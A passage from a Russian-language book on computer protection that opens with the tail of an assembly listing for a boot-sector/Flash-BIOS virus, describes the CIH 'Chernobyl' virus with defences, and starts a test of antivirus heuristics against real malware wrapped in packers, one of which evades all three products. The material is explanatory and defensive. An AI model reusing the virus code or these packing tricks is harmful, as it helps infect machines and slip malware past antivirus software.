Π§ΠΈΡ‚Π°ΠΉΡ‚Π΅ ΠΊΠ½ΠΈΠ³ΠΈ ΠΎΠ½Π»Π°ΠΉΠ½ Π½Π° Bookidrom.ru! БСсплатныС ΠΊΠ½ΠΈΠ³ΠΈ Π² ΠΎΠ΄Π½ΠΎΠΌ ΠΊΠ»ΠΈΠΊΠ΅

Π§ΠΈΡ‚Π°Ρ‚ΡŒ ΠΎΠ½Π»Π°ΠΉΠ½ Β«Π—Π°Ρ‰ΠΈΡ‚ΠΈ свой ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ Π½Π° 100% ΠΎΡ‚ вирусов ΠΈ Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²Β». Π‘Ρ‚Ρ€Π°Π½ΠΈΡ†Π° 37

Автор ОлСг Π‘ΠΎΠΉΡ†Π΅Π²

flash_done db 0

; Наш ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊ INT 19h.

int19Handler Proc Near

; Установим сСгмСнтный рСгистр ES Π² ноль

Ρ…ΠΎΠ³ Π°Ρ…, Π°Ρ…

mov es, ax

; ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ Ρ€Π΅Π·ΠΈΠ΄Π΅Π½Ρ‚Π½ΠΎΠ³ΠΎ вируса

mov ax, 0ABBAh

int 13h

; Если вирус присутствуСт, Ρ‚ΠΎ запускаСм ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½Ρ‹ΠΉ

; ΠΎΠ±Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊ прСрывания INT 19h

cmp ax, 0BAABh

jne real_int19h

; ΠŸΠ΅Ρ€Π΅Π½Π΅ΡΠ΅ΠΌ вирус ΠΈΠ· BIOS Π² boot-Π±ΡƒΡ„Π΅Ρ€

push cs

pop ds

cld

xor si, si

mov di, 7c00h

mov cx,512

rep movsb

; 3апустим вирус Π² boot-Π±ΡƒΡ„Π΅Ρ€Π΅

mov dl, 80h

jmp goto_Buffer

real_int19h:

; ΠŸΡ€ΠΎΠΈΠ·Π²Π΅Π΄Π΅ΠΌ сброс дисковой подсистСмы

xor ax, ax

int 13h

; ΠŸΡ€ΠΎΠΈΠ½ΠΈΡ†ΠΈΠ°Π»ΠΈΠ·ΠΈΡ€ΡƒΠ΅ΠΌ значСния рСгистров для Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ boot-сСктора

mov cx, 1

mov dh, 0

mov ax, 0201h

mov bx, 7C00h

; ΠŸΡ€ΠΎΠ²Π΅Ρ€ΠΈΠΌ, ΠΎΡ‚ΠΊΡƒΠ΄Π° грузимся: Ссли DL Π½Π΅ Π½ΡƒΠ»Π΅Π²ΠΎΠΉ,

; ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΠΌ ΠΊ Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ΅ с ТСсткого диска

cmp dl, 0

ja hd_int19h

; ΠŸΡ€ΠΎΡ‡Ρ‚Π΅ΠΌ boot-сСктор с дискСты. Если ΠΏΡ€ΠΈ Ρ‡Ρ‚Π΅Π½ΠΈΠΈ происходит

; ошибка, Ρ‚ΠΎ Ρ‡ΠΈΡ‚Π°Π΅ΠΌ с ТСсткого диска

int 13h

 jc fix_hd

; ΠžΡΡ‚Π°Π½ΠΎΠ²ΠΈΠΌ Ρ„Π»Π°Π³, ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°ΡŽΡ‰ΠΈΠΉ присутствиС вируса Π²ΠΎ Flash BIOS

Goto_Buffer:

mov byte ptr es:[7C00h+offset flash_done], 1

; 3апустим boot-сСктор, находящийся Π² boot-Π±ΡƒΡ„Π΅Ρ€Π΅

db 0EAh ; Код ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ JMP FAR

dw 7c00h

dw 0 Fix_HD:

; Установим Π½ΠΎΠΌΠ΅Ρ€ диска для Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ (диск Π‘)

mov dl, 80h

HD_int19h:

; ΠŸΡ€ΠΎΠΈΠ·Π²Π΅Π΄Π΅ΠΌ сброс дисковой подсистСмы

Ρ…ΠΎΠ³ Π°Ρ…, Π°Ρ…

int 13h ;

ΠŸΡ€ΠΎΡ‡Ρ‚Π΅ΠΌ boot-сСктор

mov ax, 0201h

int 13h

jc Boot

jmp Goto_Buffer ;

Если Π½Π΅ ΡƒΠ΄Π°Π»ΠΎΡΡŒ Π·Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒ boot-сСктор,

; Π²Ρ‹Π·Ρ‹Π²Π°Π΅ΠΌ ΠΏΡ€Π΅Ρ€Ρ‹Π²Π°Π½ΠΈΠ΅ INT 18h

Boot:

int 18h

int19Handler EndP

Flash_BIOS EndP

End_Virus:

; Π Π°Π·ΠΌΠ΅Ρ€ области памяти, Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡ‹ΠΉ для дополнСния

; Ρ€Π°Π·ΠΌΠ΅Ρ€Π° вируса Π΄ΠΎ 510 Π±Π°ΠΉΡ‚

DupSize equ 510-offset End_Virus

; Π—Π°ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ Π½Π΅ занятой вирусом части сСктора

db DupSize dup (0)

db 55h, 0aah

МоТно Π»ΠΈ Π²Ρ‹ΡˆΠ΅ΠΎΠΏΠΈΡΠ°Π½Π½Ρ‹ΠΉ ΠΈΠ»ΠΈ ΠΏΠΎΠ΄ΠΎΠ±Π½Ρ‹ΠΉ Π΅ΠΌΡƒ ΠΊΠΎΠ΄ Π½Π°Π·Π²Π°Ρ‚ΡŒ космополитом, Π²ΡΡ‚Ρ€Π΅Ρ‡Π°ΡŽΡ‰ΠΈΠΌΡΡ Π² "Π΄ΠΈΠΊΠΎΠΌ Π²ΠΈΠ΄Π΅"? Π”Π°, Π²ΠΏΠΎΠ»Π½Π΅. Π’ качСствС яркого ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π°, ΠΈΠ»Π»ΡŽΡΡ‚Ρ€ΠΈΡ€ΡƒΡŽΡ‰Π΅Π³ΠΎ, насколько ΡƒΠΌΠ΅Π»ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ с BIOS, умСстно привСсти ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½ΠΎΠ΅ описаниС Π·Π½Π°ΠΌΠ΅Π½ΠΈΡ‚ΠΎΠ³ΠΎ "ЧСрнобыля" (www.virusList.com).

Virus.Win9x.CIH Ρ‚Π°ΠΊΠΆΠ΅ извСстСн ΠΊΠ°ΠΊ Β«Π§Π΅Ρ€Π½ΠΎΠ±Ρ‹Π»ΡŒΒ». Π­Ρ‚ΠΎ Ρ€Π΅Π·ΠΈΠ΄Π΅Π½Ρ‚Π½Ρ‹ΠΉ вирус, Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‰ΠΈΠΉ ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΠΏΠΎΠ΄ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹ΠΌΠΈ систСмами Windows 95/98. Π”Π»ΠΈΠ½Π° вируса ΠΎΠΊΠΎΠ»ΠΎ 1 ΠšΠ±Π°ΠΉΡ‚. Π’ΠΏΠ΅Ρ€Π²Ρ‹Π΅ Π±Ρ‹Π» ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ Π½Π° Π’Π°ΠΉΠ²Π°Π½Π΅ Π² 1998 Π³ΠΎΠ΄Ρƒ. Π˜Π·Π±ΠΈΡ€Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ ΠΏΠ΅Ρ€Π΅ΠΏΡ€ΠΎΡˆΠΈΠ²Π°Π΅Ρ‚ BIOS: для зараТСния подходят Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Ρ‚ΠΈΠΏΡ‹ матСринских ΠΏΠ»Π°Ρ‚, ΠΊ Ρ‚ΠΎΠΌΡƒ ΠΆΠ΅ Π² настройках BIOS Π½Π΅ Π΄ΠΎΠ»ΠΆΠ½ΠΎ Π±Ρ‹Ρ‚ΡŒ установлСно Ρ‡Ρ‚Π΅Π½ΠΈΠ΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ. ПослС ΠΏΠ΅Ρ€Π΅ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ BIOS вирус приступаСт ΠΊ винчСстСру, Π° Ρ‚ΠΎΡ‡Π½Π΅Π΅, ΡƒΠ½ΠΈΡ‡Ρ‚ΠΎΠΆΠ°Π΅Ρ‚ всС Π΅Π³ΠΎ содСрТимоС. ΠŸΡ€ΠΈ этом вирус ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ прямой доступ ΠΊ диску, обходя Ρ‚Π΅ΠΌ самым ΡΡ‚Π°Π½Π΄Π°Ρ€Ρ‚Π½ΡƒΡŽ Π°Π½Ρ‚ΠΈΠ²ΠΈΡ€ΡƒΡΠ½ΡƒΡŽ Π·Π°Ρ‰ΠΈΡ‚Ρƒ ΠΎΡ‚ записи Π² Π·Π°Π³Ρ€ΡƒΠ·ΠΎΡ‡Π½Ρ‹Π΅ сСктора.

Π’ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹ Π·Π°Ρ‰ΠΈΡ‚Ρ‹ (плюс Ρ‚Π°ΠΊΠΈΠ΅ классичСскиС Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹, ΠΊΠ°ΠΊ установка послСднСй вСрсии антивирусной ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ с Π½ΠΎΠ²Ρ‹ΠΌΠΈ Π±Π°Π·Π°ΠΌΠΈ):

♦ настройка BIOS, ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ Ρ€Π΅ΠΆΠΈΠΌΠ° Ρ‡Ρ‚Π΅Π½ΠΈΠ΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ;

♦ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒ критичСских областСй с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ спСциализированных ΡƒΡ‚ΠΈΠ»ΠΈΡ‚ Ρ‚ΠΈΠΏΠ° ADINF32.

Π’ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹ лСчСния:

♦ ΡƒΠ΄Π°Π»Π΅Π½ΠΈΠ΅ вируса ΠΈ Π΅Π³ΠΎ записСй с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Π²Π°ΠΊΡ†ΠΈΠ½ Ρ‚ΠΈΠΏΠ° "ΠΠ½Ρ‚ΠΈΠ§Π΅Ρ€Π½ΠΎΠ±Ρ‹Π»ΡŒ" ΠΈ Ρ‚. ΠΏ.;

♦ Ρ€Π°Π΄ΠΈΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΉ ΠΌΠ΅Ρ‚ΠΎΠ΄ – ΠΏΠ΅Ρ€Π΅ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠ° BIOS/Π·Π°ΠΌΠ΅Π½Π° микросхСм.

5.4. Как Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ эвристичСский Π°Π½Π°Π»ΠΈΠ·Π°Ρ‚ΠΎΡ€ ΠΊΠΎΠ΄Π° ΠΈ ΠΏΠΎΡ‡Π΅ΠΌΡƒ Π΄Π°ΠΆΠ΅ Π΄Π²Π° антивируса Π² систСмС ΠΌΠΎΠ³ΡƒΡ‚ ΡΡ‚Π°Ρ‚ΡŒ бСсполСзными

Π’ Ρ€Π°ΠΌΠΊΠ°Ρ… Π΄Π°Π½Π½ΠΎΠ³ΠΎ Ρ€Π°Π·Π΄Π΅Π»Π° ΠΌΡ‹ попытаСмся Π²Ρ‹ΡΡΠ½ΠΈΡ‚ΡŒ, Π΄Π΅ΠΉΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π»ΠΈ Π΄Π°ΠΆΠ΅ Ρ‚Ρ€ΠΈ антивируса ΠΌΠΎΠ³ΡƒΡ‚ Π΄Π°Ρ‚ΡŒ сбой Π² ΠΏΠΎΠΈΠΌΠΊΠ΅ Β«Ρ…ΠΈΡ‚Ρ€ΠΎΠ³ΠΎΒ» ΠΊΠΎΠ΄Π°, ΠΈ ΠΊΠ°ΠΊ с этим связано Ρ‚Π°ΠΊΠΎΠ΅ качСство антивирусного ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°, ΠΊΠ°ΠΊ эвристика. Π’ Ρ€ΠΎΠ»ΠΈ испытуСмых антивирусов Π±Ρ‹Π»ΠΈ Π²Ρ‹Π±Ρ€Π°Π½Ρ‹ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ популярныС ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹:

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ";

♦ ESET NOD32;

♦ Vba32 ("ВирусБлокАда").

ΠŸΠ Π˜ΠœΠ•Π§ΠΠΠ˜Π•

Π’ Π΄Π°Π½Π½ΠΎΠΌ тСстС ΠΌΡ‹ Π°ΠΊΡ†Π΅Π½Ρ‚ΠΈΡ€ΡƒΠ΅ΠΌ особоС Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° антивирусном ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π΅ Vba32. Π­Ρ‚ΠΎ бСлорусский антивирус, Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‰ΠΈΠΉ Π² сСбя достаточно ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½Ρ‹ΠΉ эвристичСский ΠΌΠΎΠ΄ΡƒΠ»ΡŒ, Π² основС ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ стоит запатСнтованная тСхнология "MalwareScopeTM".

ΠœΠ΅Ρ‚ΠΎΠ΄ΠΎΠ»ΠΎΠ³ΠΈΡ провСдСния тСста

Напомним, Ρ‡Ρ‚ΠΎ качСство эвристики опрСдСляСтся ΡΠΏΠΎΡΠΎΠ±Π½ΠΎΡΡ‚ΡŒΡŽ антивируса Ρ€Π°ΡΠΏΠΎΠ·Π½Π°Π²Π°Ρ‚ΡŒ ΠΌΠΎΠ΄ΠΈΡ„ΠΈΡ†ΠΈΡ€ΠΎΠ²Π°Π½Π½Ρ‹ΠΉ врСдоносный ΠΊΠΎΠ΄. ЀактичСски, эвристика ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»Π°Π³Π°Π΅Ρ‚ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ вируса, ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ Π½Π΅Ρ‚ Π² Π±Π°Π·Π°Ρ…: ΠΏΠΎ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΌ Π°Π»Π³ΠΎΡ€ΠΈΡ‚ΠΌΠ°ΠΌ ΠΈ Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ ΠΏΡ€ΠΈΠ·Π½Π°ΠΊΠ°ΠΌ антивирус сам Π΄ΠΎΠ»ΠΆΠ΅Π½ Β«Π΄ΠΎΠΌΡ‹ΡΠ»ΠΈΡ‚ΡŒΒ», Ρ‡Ρ‚ΠΎ провСряСмый ΠΊΠΎΠ΄ являСтся вирусным. Как Π²Ρ‹ ΡƒΠΆΠ΅ поняли, Π·Π°Π΄Π°Ρ‡Π° Π½Π΅ ΠΈΠ· Π»Π΅Π³ΠΊΠΈΡ….

Для наибольшСй ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΠΈ тСста ΠΌΡ‹ возьмСм максимально ΡˆΠΈΡ€ΠΎΠΊΠΈΠΉ ΠΏΠ΅Ρ€Π΅Ρ‡Π΅Π½ΡŒ инструмСнтов, примСняСмых Π² ΠΏΠΎΠ΄ΠΎΠ±Π½Ρ‹Ρ… случаях. Помимо ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ², Π³Π΅Π½Π΅Ρ€Π°Ρ‚ΠΎΡ€ΠΎΠ² вирусов ΠΈ ΡƒΡ‚ΠΈΠ»ΠΈΡ‚ для обфускации, ΠΌΡ‹ Π²ΠΊΠ»ΡŽΡ‡ΠΈΠΌ Π² наш тСст самописный вирус, Π° Ρ‚Π°ΠΊΠΆΠ΅ Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡΡ ΠΏΠΎΠ»ΠΈΠΌΠΎΡ€Ρ„Π½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·Ρ†ΠΎΠΌ Virus.Win32.Zombie, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ извСстСн ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½ΠΎΠΉ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠ΅ΠΉ дСкриптования для ΠΎΠ±Ρ…ΠΎΠ΄Π° эвристичСских Π°Π½Π°Π»ΠΈΠ·Π°Ρ‚ΠΎΡ€ΠΎΠ².

Подобная мСтодология, Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‰Π°Ρ комплСксноС тСстированиС, ΡˆΠΈΡ€ΠΎΠΊΠΎ примСняСтся Π² сСртифицированных тСстовых лабораториях ΠΈ позволяСт ΠΌΠΈΠ½ΠΈΠΌΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Π΅ ΠΏΠΎΠ³Ρ€Π΅ΡˆΠ½ΠΎΡΡ‚ΠΈ, сдСлав Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ тСста максимально ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΈΠ²Π½Ρ‹ΠΌ.

"Π‘Π²Π΅ΠΆΠ΅ΡΡ‚ΡŒ" Π±Π°Π· всСх Ρ‚Ρ€Π΅Ρ… антивирусов ΠΎΠ΄ΠΈΠ½Π°ΠΊΠΎΠ²Π°. Π£Ρ€ΠΎΠ²Π΅Π½ΡŒ настроСк эвристики Π²ΠΎ всСх Ρ‚Ρ€Π΅Ρ… случаях Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π΅Π½ ΠΈ ΠΏΡ€ΠΈΡ€Π°Π²Π½Π΅Π½ ΠΊ срСдним.

Π˜Ρ‚Π°ΠΊ, ΠΏΠΎΠΆΠ°Π»ΡƒΠΉ, Π½Π°Ρ‡Π½Π΅ΠΌ.

ВСст β„– 1

Для провСдСния ΠΏΠ΅Ρ€Π²ΠΎΠ³ΠΎ тСста Π±Ρ‹Π»ΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Π½Ρ‹ случайным ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ ΠΎΡ‚ΠΎΠ±Ρ€Π°Π½Π½Ρ‹Π΅ ΠΈΠ· ΠΊΠΎΠ»Π»Π΅ΠΊΡ†ΠΈΠΈ (579 ΡˆΡ‚ΡƒΠΊ) Ρ‡Π΅Ρ‚Ρ‹Ρ€Π΅ экзСмпляра врСдоносного ΠΊΠΎΠ΄Π°:

♦ TrojanDownloader.13547;

♦ Backdoor. Win32Optix.b;

♦ Trojan-Win32PSW.QQRob.16;

♦ Trojan-Win32PSW.QQShou.EH.

ΠšΠ°ΠΆΠ΄Ρ‹ΠΉ экзСмпляр Π±Ρ‹Π» ΠΏΡ€ΠΎΠΏΡƒΡ‰Π΅Π½ Ρ‡Π΅Ρ€Π΅Π· PeStubOEP (ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π° для Π·Π°Ρ‰ΠΈΡ‚Ρ‹ EXE-Ρ„Π°ΠΉΠ»ΠΎΠ² ΠΎΡ‚ опрСдСлСния ΠΈΡ… компилятора/ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠ°). Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ ("+" – распознан; "-" – Π½Π΅ распознан). Π˜Ρ‚Π°ΠΊ (Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹ Π½Π° рис. 5.3).

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+".

Рис. 5.3. TrojanDownloader.13547 Π±Ρ‹Π» ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎ Π½Π°ΠΉΠ΄Π΅Π½

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.4).

Рис. 5.4. Backdoor.Win32Optix.b – Β«ΠΊΡ€Π΅ΠΏΠΊΠΈΠ΅ ΠΎΡ€Π΅ΡˆΠΊΠΈΒ» Π΅Ρ‰Π΅ Π²ΠΏΠ΅Ρ€Π΅Π΄ΠΈ!

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.5).

Рис. 5.5. Наш антивирус ΠΏΠΎΠΊΠ° Π½Π° высотС

Trojan-Win32PSW.QQShou.EH оказался ΠΊΡ€Π΅ΠΏΠΊΠΈΠΌ ΠΎΡ€Π΅ΡˆΠΊΠΎΠΌ, ΠΈ Vba32 ΠΎΠΏΡ€Π΅Π΄Π΅Π»ΠΈΠ» Π΅Π³ΠΎ, Ρ‚ΠΎΠ»ΡŒΠΊΠΎ послС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π±Ρ‹Π»ΠΈ установлСны ΠΌΠ°ΠΊΡΠΈΠΌΠ°Π»ΡŒΠ½Ρ‹Π΅ настройки:

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.6, 5.7).

ΠŸΠ Π˜ΠœΠ•Π§ΠΠΠ˜Π•

Один ΠΈΠ· экзСмпляров врСдоносного ΠΊΠΎΠ΄Π° (Trojan-Win32PSW.QQShou.EH) Vba32 Π±Ρ‹Π» ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½ ΠΊΠ°ΠΊ Trojan-Spy.Delf.13.

Как Π²ΠΈΠ΄ΠΈΡ‚Π΅, Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΈΠ· экзСмпляров врСдоносного ΠΊΠΎΠ΄Π° ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Ρ‹ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ с ΠΌΠ°ΠΊΡΠΈΠΌΠ°Π»ΡŒΠ½Ρ‹ΠΌΠΈ настройками, ΠΈ совсСм Π½Π΅ Ρ„Π°ΠΊΡ‚, Ρ‡Ρ‚ΠΎ антивирус расскаТСт Π²Π°ΠΌ всю ΠΏΡ€Π°Π²Π΄Ρƒ.

Рис. 5.6. ЭкспСртный Π°Π½Π°Π»ΠΈΠ· – максималСн!

Рис. 5.7. ΠŸΠΎΡ…ΠΎΠΆ Π½Π° Spy-Delf…

Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΡƒΡŽ ΠΏΠ°Ρ€Ρ‚ΠΈΡŽ экзСмпляров, случайно ΠΎΡ‚ΠΎΠ±Ρ€Π°Π½Π½Ρ‹Ρ… ΠΈΠ· ΠΊΠΎΠ»Π»Π΅ΠΊΡ†ΠΈΠΈ:

♦ Trojan.Spambot;

♦ OS.cope.Worm.UK.Nuwar;

♦ Trojan-Proxy.WIN32.Lager.aq.

Π”Π²Π° троянских коня ΠΈ Ρ‡Π΅Ρ€Π²ΡŒ Π±Ρ‹Π»ΠΈ Π·Π°ΠΏΠ°ΠΊΠΎΠ²Π°Π½Ρ‹ Tibs. ΠŸΡ€ΠΎΠ²Π΅Ρ€ΡΠ΅ΠΌ:

♦ Nod32 2.7 "-";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.8).

Рис. 5.8. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ – Trojan.Spambot!

ΠŸΠ Π˜ΠœΠ•Π§ΠΠΠ˜Π•

Как Π²ΠΈΠ΄ΠΈΡ‚Π΅, здСсь нас Π½Π΅ΠΌΠ½ΠΎΠ³ΠΎ ΠΎΠ³ΠΎΡ€Ρ‡ΠΈΠ» NOD32. Но Π½Π΅ Π±ΡƒΠ΄Π΅ΠΌ Π·Π°Π±Ρ‹Π²Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π΄Π°ΠΆΠ΅ качСствСнно ΠΏΡ€ΠΎΡ€Π°Π±ΠΎΡ‚Π°Π½Π½Ρ‹ΠΉ Π΄Π²ΠΈΠΆΠΎΠΊ Π½Π΅ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½Π΅Π½.

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.9).

Рис. 5.9. Π‘Π°ΠΌΡ‹ΠΉ настоящий Ρ‡Π΅Ρ€Π²ΡŒ!

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.10).

Рис. 5.10. ΠŸΡ€ΠΎΠΊΡΠΈ-троян Ρƒ нас ΠΏΠΎΠ΄ ΠΊΠΎΠ»ΠΏΠ°ΠΊΠΎΠΌ

ΠŸΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°Π΅ΠΌ наши экспСримСнты. Π’Π΅ΠΏΠ΅Ρ€ΡŒ возьмСм Ρ‚Ρ€ΠΈ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… вируса ΠΈ Π½Π°ΠΎΠ±ΡƒΠΌ Π·Π°ΠΏΠ°ΠΊΡƒΠ΅ΠΌ ΠΈΡ… трСмя Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹ΠΌΠΈ ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠ°ΠΌΠΈ. Вроянского коня ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‹Π²Π°Π΅ΠΌ NsAnti. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹:

♦ Nod32 2.7 "+";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "+";

♦ Vba32 "+" (рис. 5.11).

Рис. 5.11. На Π»ΠΎΠ²Ρ†Π° ΠΈ Π·Π²Π΅Ρ€ΡŒ Π±Π΅ΠΆΠΈΡ‚!

Π’Π΅ΠΏΠ΅Ρ€ΡŒ Trojan-Spy.Win32.AimSpy Π·Π°ΠΏΠ°ΠΊΡƒΠ΅ΠΌ SkD Undetectabler Pro 2 SkDPRO. Π Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹:

♦ Nod32 2.7 "-";

♦ "Антивирус ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎ 6.0" "-";

♦ Vba32 "-".

ΠŸΠ Π˜ΠœΠ•Π§ΠΠΠ˜Π•

